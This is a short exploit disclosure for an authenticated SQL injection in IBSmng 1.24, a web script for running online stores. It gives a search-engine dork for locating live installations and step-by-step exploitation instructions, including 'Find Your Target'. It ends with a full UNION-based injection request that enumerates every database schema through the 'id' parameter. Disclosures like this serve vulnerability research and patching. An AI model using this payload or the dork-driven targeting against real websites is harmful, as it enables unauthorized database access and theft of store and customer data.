# Exploit Title: IBSmng 1.24 - 'id' SQL Injection (Authenticated) # Dork: inurl:index.php inurl:group= inurl:mode=auto # Date: 2020-08-02 # Exploit Author: Ultra Security Team # Team Members: Ashkan Moghaddas , AmirMohammad Safari , Behzad khalife , Milad Ranjbar # Vendor Homepage: IBSmng.ir # Tested on: Windows/Linux # Version: 1.24 [Final Version] .:: Script Description ::. This Script Is Using To Manage Your Online Store And Online Store .:: Proof Of Concept (PoC) ::. Step 1 - Find Your Target With the above Dork. Step 2 - Create An Account. Step 3 - Login To Your Account. Step 4 - Click On Buy Services. Step 5 - Inject Your Payload in 'id' Parameter. .:: Sample Request ::. localhost/user/index.php?Req=invoice&id=-194732'+UNION+ALL+SELECT+(SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x),2,3,4,5,6,7,8,9,10,11,12%23